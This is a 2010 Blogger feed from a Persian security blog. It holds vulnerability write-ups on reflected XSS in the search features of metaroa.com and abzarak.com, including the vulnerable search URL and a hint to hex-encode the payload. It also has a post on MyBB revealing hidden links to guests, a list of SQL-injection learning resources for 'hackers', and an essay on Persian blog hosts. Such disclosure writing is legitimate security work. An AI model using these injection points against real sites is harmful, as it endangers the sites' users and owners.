<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7813959987674775070</id><updated>2011-07-08T18:55:47.300+04:30</updated><category term='XSS'/><category term='تحلیلی'/><title type='text'>سکانار</title><subtitle type='html'>وبلاگ شخصی محمد جوانبخت / نوشتاری پیرامون امنیت و ضد امنیت / XSS , SQL Injection</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>15</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-5531000350516593717</id><published>2010-08-23T14:51:00.000+04:30</published><updated>2010-08-23T14:51:32.094+04:30</updated><title type='text'>XSS در METAROA.com - قسمت سوم</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div style="background-color: #073763;"&gt;&lt;a href="http://secanar.blogspot.com/2010/08/xss-metaroacom_21.html"&gt;قسمت قبل&lt;/a&gt;&lt;/div&gt;در این جا کد زیر را تزریق می نماییم :&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/THJEst5l--I/AAAAAAAAAJ8/j2uON_Xxhl8/s1600/met8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/THJEst5l--I/AAAAAAAAAJ8/j2uON_Xxhl8/s320/met8.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;در این حالت مشاهده می شود که XSS برروی بخش MoreTools اعمال می گردد !&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/site/secanarprojects/met9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="263" src="https://sites.google.com/site/secanarprojects/met9.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5531000350516593717?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/5531000350516593717/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom_23.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5531000350516593717'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/5531000350516593717'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom_23.html' title='XSS در METAROA.com - قسمت سوم'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_HjC-UOu9N2Q/THJEst5l--I/AAAAAAAAAJ8/j2uON_Xxhl8/s72-c/met8.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-7783742115707314738</id><published>2010-08-21T18:44:00.001+04:30</published><updated>2010-08-21T18:55:09.032+04:30</updated><title type='text'>XSS  در  METAROA.com - قسمت دوم</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div style="text-align: right;"&gt;&lt;a href="http://secanar.blogspot.com/2010/08/xss-metaroacom.html"&gt;&lt;span style="background-color: #0c343d;"&gt;قسمت قبل&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://secanar.blogspot.com/2010/08/xss-metaroacom.html"&gt;&lt;/a&gt;&lt;br /&gt;... در این صورت خطایی به صورت زیر مشاهده می شود !&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_ZlHoW-9I/AAAAAAAAAJs/Qjftb0rHikU/s1600/met6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_ZlHoW-9I/AAAAAAAAAJs/Qjftb0rHikU/s320/met6.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;این خطا مربوط به تزریق یک کد اسکریپت است . اما ما در اینجا از اسکریپت کد خاصی استفاده نکردیم و فقط از یک فرمان ساده ی HTML استفاده نمودیم که این فرمان تنها باید واژه ی XSS&amp;nbsp; را به صورت Header1 نمایش دهد .&lt;br /&gt;&lt;br /&gt;اما علت این موضوع ...&lt;br /&gt;&lt;br /&gt;بعد از سرچ ، سرس کد صفحه را بررسی می کنیم !&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_cU-Nb7FI/AAAAAAAAAJ0/4ZnSbBhhgAw/s1600/met7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="8" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_cU-Nb7FI/AAAAAAAAAJ0/4ZnSbBhhgAw/s320/met7.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;کد فوق در خط 259 سرس کد مشاهده می شود ، در اصل این کد ناشی از محتوای "توضیحات" یکی از موارد یافته شده در جستوجو می باشد ، زمانی که ما از کد HTML موردنظر XSSجهت&amp;nbsp; استفاده کردیم کد فوق که در اصل یک متن بوده به صورت یک کد در آمده ، اسکریپت کد (alert(1337 سبب ایجاد پیغام خطا و HTML کد merquee سبب به حرکت درآمدن واژه ی XSS&amp;nbsp; در سراسر صفحه شده !&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-7783742115707314738?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/7783742115707314738/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom_21.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/7783742115707314738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/7783742115707314738'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom_21.html' title='XSS  در  METAROA.com - قسمت دوم'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_ZlHoW-9I/AAAAAAAAAJs/Qjftb0rHikU/s72-c/met6.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-2079616452034048138</id><published>2010-08-17T11:22:00.003+04:30</published><updated>2010-08-21T17:55:29.816+04:30</updated><title type='text'>XSS  در  METAROA.com - قسمت اول</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div style="background-color: #0c343d; color: #0c343d; text-align: center;"&gt;&lt;a href="http://packetstormsecurity.org/1008-exploits/metaroa-xss.txt"&gt;لینک ثبت در packetstormsecurity&lt;/a&gt;&amp;nbsp;&lt;/div&gt;این آسیب پذیری ناشی از عدم فیلتر گذاری مناسب برروی کارکتر های ورودی است . در این صورت بدون هیچ پردازشی بر روی داده های ورودی آن ها به نمایش گذاشته می شوند !&lt;br /&gt;کدهای php :&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/site/secanarprojects/met2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met2.jpg" width="272" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/site/secanarprojects/met3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met3.jpg" width="259" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/site/secanarprojects/met4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met4.jpg" width="290" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;کد HTML مربوط به فرم سرچ:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;&lt;a href="https://sites.google.com/site/secanarprojects/met1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="62" src="https://sites.google.com/site/secanarprojects/met1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;اما نکته ی بسیار جالب در مورد این سایت !!!&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;کد زیر را به تزریق کردم :&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;a href="https://sites.google.com/site/secanarprojects/met5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://sites.google.com/site/secanarprojects/met5.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;اما...&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: right;"&gt;&lt;b style="color: #cc0000;"&gt;ادامه مطلب در قسمت بعدی...&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-2079616452034048138?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/2079616452034048138/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/2079616452034048138'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/2079616452034048138'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/08/xss-metaroacom.html' title='XSS  در  METAROA.com - قسمت اول'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-2992034155423361401</id><published>2010-07-29T20:33:00.002+04:30</published><updated>2010-07-29T20:40:10.776+04:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='تحلیلی'/><title type='text'>تاریخپه سرویس دهنده های وبلاگ  فارسی</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;همین الآن توی سایت محترم گوگل کلمه "وبلاگ" رو سرچ کردم !!!! با رقم بی سابقه ای از سرویس دهنده های وبلاگ روبه رو شدم !!! واقعآ که جای تعجب داره ! به سال 83 برگردیم اون زمان 2دو سرویس دهنده ی خیلی رایج وجود داشت که بلاگفا و پرشین بلاگ بود به اضافه چندتای دیگه که تعدادشون از انگشت های یک دست تجاوز نمی کرد !(مثلآ بلاگ اسکی و ...)&lt;br /&gt;همون زمان بود که یک سرور جدید به نام میهن بلاگ اضافه شد که من پیش خودم گفتم ... اوه چه خبره ...(به نظرم لزومی نداشت که یکی دیگه اضافه بشه)&amp;nbsp; اما انصافآ میهن بلاگ نسبت به بقیه ی سرویس دهنده ها تمایز داشت و وجودش خالی از اشکال بود چون سلیقه های جدیدی رو به خودش جذب می کرد ! حالا چهار سال میایم جلوتر یعنی سال 87 مقاله ای تحت عنوان" آموزش جامع وبلاگ نويسي براي همه" در مجله دانش و کامپیوتر (شماره79) به چاپ رسوندم در این مقاله سعی کردم تمام سرویس دهنده هارو معرفی کنم که در مجموع 8 تا شد که حالا نهایتآ 2 تا از قلم افتاده با شه سر جمع می شه گفت اون زمان کمتر از 10 تا سرویس دهنده فارسی وجود داشت که همشون هم با هم متمایز بودن و سلایق مختلفی رو جذب می کردن ...خب ، و بر می گردیم به زمان حال...&lt;br /&gt;&lt;br /&gt;با یک حساب سر انگشتی در این لحظه که شما مشغول مطالعه ی این پست هستید چیزی در حدود 20 الی 30 سرویس دهنده وبلاگ وجود داره اگر از ده تا سرویس دهنده ی قدیمی فاکتور بگیریم حداقل چیزی حدود 10 سرویس دهنده ی جدید اضافه شده .&lt;br /&gt;با توجه به رشد بیش از حد سرویس دهنده ها ما رشد کیفی قابل ملاحظه ای در طول این چهار سال نداشتیم .&lt;br /&gt;بلکه با سرویس دهنده هایی روبه رو هستیم که حتی از لحاظ طراحی صفحه و چیدمان کاملآ با هم مشابه هستند و فرمت کلیشون برگرفته از "بلاگفا" هستش (تعدادشون خیلی زیاد هست و من نامی نمی برم ، خودتون با یه سرچ توی گوگل همه چیز را در خواهید یافت) !!!!&lt;br /&gt;اما واقعآ چرا... ؟ من هم دلیل این موضوع رو نمی دونم فقط اینو می دونم که لزومی به این همه سرویس دهنده با خدمات مشابه وجود نداره این که تعداد وبلاگ نویس ها در سال های اخیر بیشتر شده توجیهی بر این موضوع نیست . با ظهور سرویس دهنده های کاملآ مشابه از لحاظ خدماتی تنها تفاوت بین سرویس دهنده های مختلف نام دامنه وبلاگ هستش ...&lt;br /&gt;خیلی از این سرویس دهنده ها حتی از لحاظ طراحی سایت بسیار بسیار ضعیف هستند و هیچ شباهتی به یک سایت رسمی ندارن اینو به سادگی می شه مشاهده کرد ...&lt;br /&gt;به هر حال امیدوارم که در آینده با رشد کیفی سرویس دهنده های وبلاگ و افزایش ابزار های وبلاگ نویسی روبه رو باشیم !!!!.....تا با&amp;nbsp; ظهور سرویس دهنده های جدید و تکراری !&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-2992034155423361401?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/2992034155423361401/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/07/blog-post_29.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/2992034155423361401'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/2992034155423361401'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/07/blog-post_29.html' title='تاریخپه سرویس دهنده های وبلاگ  فارسی'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-8011978916489637637</id><published>2010-07-26T18:44:00.002+04:30</published><updated>2010-07-28T16:53:37.252+04:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>آسیب پذیری XSS در ابزارک دات کام</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://packetstorm.linuxsecurity.com/1007-exploits/abzarak-xss.txt"&gt;لینک Exploit در packetstormsecurity&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;آسیب پذیری در این سایت مربوط به تگ جستوجو هستش .&lt;br /&gt;کدهای تست شده :&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://sites.google.com/site/secanarprojects/abzarak.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://sites.google.com/site/secanarprojects/abzarak.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;لینک آسیب پذیری:&lt;br /&gt;&lt;div dir="ltr" style="text-align: center;"&gt;http://www.abzarak.com/?s=&lt;/div&gt;&lt;div style="color: #b45f06; text-align: center;"&gt;(درمقابل =s&amp;nbsp; باید کد به صورت HEX وارد شود)&lt;/div&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div dir="rtl" style="text-align: right;"&gt;تست شده در مرورگر&amp;nbsp;Mozilla Firefox&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-8011978916489637637?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/8011978916489637637/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/07/xss.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/8011978916489637637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/8011978916489637637'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/07/xss.html' title='آسیب پذیری XSS در ابزارک دات کام'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-4279177705497691301</id><published>2010-06-24T12:06:00.007+04:30</published><updated>2010-07-05T13:53:57.064+04:30</updated><title type='text'>برای مشاهده لینک حتمآ باید عضو باشیم ؟</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;شاید براتون پیش اومده باشه توی گوگل چیزی رو برای دانلود شرچ می کنید و اگر فای مورد نظرتون توی یک Forum باشه ممکنه با این پیغام روبه رو بشید :&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #76a5af; text-align: center;"&gt;متاسفیم ... کاربران مهمان قادر به مشاهده لینک نمی باشند . برای مشاهده لینک باید ثبت نام کنید...&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;در این صورت شما دو راه دارید یا باید وقت بگذارید و عضو بشید و راه دوم اینه که حوصله ی فرم پر کردن نداشته باشید و مجددآ سرچ کنید تا یک جای دیگه فایلتوتنو بدون دردسر دانلود کنید .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;اما اگر با Forumی مثل Forum زیر روبه رو شدید راه سومی هم وجود داره ...&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;http://www.iran-forum.ir/thread-12403-post-104780.html#pid104780&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;span dir="rtl" lang="AR-AE"&gt;در این حالت نشان گرد موس را روی جعبه ی خطا برده و لینک مورد نظر را در نوار وضعیت مرورگر مشاهده کنید&lt;o:p _moz-userdefined=""&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;div style="text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="color: red;"&gt; &lt;span style="color: black;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;این نارسایی در MyBB وجود دارد !&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4279177705497691301?l=secanar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://secanar.blogspot.com/feeds/4279177705497691301/comments/default' title='نظرات پيام'/><link rel='replies' type='text/html' href='http://secanar.blogspot.com/2010/06/blog-post.html#comment-form' title='0 نظر'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4279177705497691301'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7813959987674775070/posts/default/4279177705497691301'/><link rel='alternate' type='text/html' href='http://secanar.blogspot.com/2010/06/blog-post.html' title='برای مشاهده لینک حتمآ باید عضو باشیم ؟'/><author><name>محمد جوانبخت</name><uri>http://www.blogger.com/profile/03809211800879576622</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='26' height='32' src='http://4.bp.blogspot.com/_HjC-UOu9N2Q/TE2ehVdjjjI/AAAAAAAAAI0/RZu7EEFMC1o/s1600-R/MJ_002.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7813959987674775070.post-1514963483898355419</id><published>2010-06-24T10:38:00.006+04:30</published><updated>2010-06-25T13:11:20.918+04:30</updated><title type='text'>ابزار های لازم برای Sql injection</title><content type='html'>&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;حملات &lt;a href="http://en.wikipedia.org/wiki/SQL_injection"&gt;sql injection&lt;/a&gt; احتیاج به نرم افزار خاصی نداره و بیش از هر چیز آگاهی هکر از نوع و عملکرد پایگاه تعیین کننده هستش ، اینجا می خواستم ابزار هایی معرفی کنم که به عقیده ی من یک هکر باید برای این نوع حملات ازش بهره بگیره :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. قبل از هرچیز یک هکر باید علم کافی در زمینه ی پایگاه های داده داشته باشه به این منظور کتاب و مقالات زیادی توی اینترنت و توی کتاب فروشی ها موجود هستش همچنین مطالعه در زمینه php , asp هم کمک کننده هست.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. به طور کلی sql injection cheat sheet ها معجزه می کنند من &lt;a href="http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/"&gt;اینو&lt;/a&gt; پیشنهاد می کنم .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. یک مقاله هستش با عنوان  &lt;a href="http://www.ngssoftware.com/papers/advanced_sql_injection.pdf"&gt;Advanced sql injection in sql server application&lt;/a&gt; و یک کتاب با عنوان&lt;a href="http://sodaphish.com/files/ebks/try2innovate.com/downloads/E-books/Hacking/Hacking%20Exposed-%20Web%20Applications%20%28MCGraw-Hill-2002%29.pdf"&gt;Hacking Exposed- Web Applications&lt;/a&gt; که به عقیده من به عنوان یک رفرنس میتونه به شما کمک کنه .(البته انتقادی که بی این دو وارده به علت قدیمی بودنش هست اما این که  چیزی قدیمی بشه دال بر بی استفاده بودنش نیست)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div dir="rtl" style="text-align: right;"&gt;4.مراجعه به تالار های گفتمان برای اینکه مشکلاتتون رو بتونید مطرح کنید و از تجربه افراد استفاده کنید (من سایت های ایرانیو پیشنهاد نمی کنم به دلیل ....) و همچنین آگاهی از اکسپلویت های روز ، من &lt;a href="http://packetstormsecurity.org/"&gt;اینو&lt;/a&gt; معرفی می کنم .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. و در نهایت تجربه بزرگترین ابزار شما خواهد بود با انجام پروژه های متعدد Sql injection به این درجه خواهید رسید .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;این بود مختصری از پیشنهادات من !&lt;br /&gt;&lt;br /&gt;موفق و پیروز باشید&lt;br /&gt;&lt;script&gt;&lt;/script&gt;&lt;noscript&gt;&lt;/noscript&gt;&lt;/div&gt;&lt;style type="text/css"&gt;.gac_od {  BORDER-TOP-WIDTH: 0px; BORDER-RIGHT: #e7e7e7 1px solid; PADDING-RIGHT: 0px! important; PADDING-LEFT: 0px! important; BORDER-LEFT-WIDTH: 0px; Z-INDEX: 99; BACKGROUND: white; PADDING-BOTTOM: 0px! important; MARGIN: 0px; PADDING-TOP: 0px! important; BORDER-BOTTOM: #e7e7e7 1px solid; POSITION: absolute } .gac_id {  BORDER-RIGHT: #558be3 1px solid; BORDER-TOP: #a2bff0 1px solid; DISPLAY: block; Z-INDEX: 99; BACKGROUND: white; MARGIN: 0px; BORDER-LEFT: #a2bff0 1px solid; BORDER-BOTTOM: #558be3 1px solid; POSITION: relative } .gac_m {  BORDER-TOP-WIDTH: 0px; PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 0px; BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 17px; Z-INDEX: 99; BACKGROUND: white; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; CURSOR: default; LINE-HEIGHT: 117%; PADDING-TOP: 0px; POSITION: relative; BORDER-RIGHT-WIDTH: 0px } .gac_wd {  Z-INDEX: 100; RIGHT: -1px; BACKGROUND: #999; WIDTH: 1px; POSITION: absolute; TOP: 0px; HEIGHT: 1px } .gac_m TD {  LINE-HEIGHT: 22px } .gac_n {  PADDING-BOTTOM: 1px; PADDING-TOP: 1px } .gac_b TD.gac_c {  BACKGROUND: #d5e2ff } .gac_b {  BACKGROUND: #d5e2ff } .gac_a TD.gac_f {  BACKGROUND: #fff8dd } .gac_p {  PADDING-RIGHT: 4px; PADDING-LEFT: 3px; PADDING-BOTTOM: 2px; PADDING-TOP: 1px } .gac_u {  PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 1px; LINE-HEIGHT: 117%; PADDING-TOP: 0px; TEXT-ALIGN: left } .gac_t {  FONT-SIZE: 17px; WIDTH: 100%; TEXT-ALIGN: left } .gac_za {  PADDING-RIGHT: 5px; FONT-SIZE: 12px; RIGHT: 0px; BOTTOM: 0px; POSITION: absolute; TEXT-ALIGN: right } .gac_bt {  PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 7px; WIDTH: 637px; PADDING-TOP: 8px; POSITION: relative; TEXT-ALIGN: center } .gac_sb {  FONT-SIZE: 15px; MARGIN: 0.2em; HEIGHT: 28px } .gac_z {  COLOR: #c00; WHITE-SPACE: nowrap } .gac_s {  FONT-SIZE: 1px; HEIGHT: 3px; row-height: 1px } .gac_c {  PADDING-RIGHT: 3px; PADDING-LEFT: 7px; PADDING-BOTTOM: 1px; OVERFLOW: hidden; WHITE-SPACE: 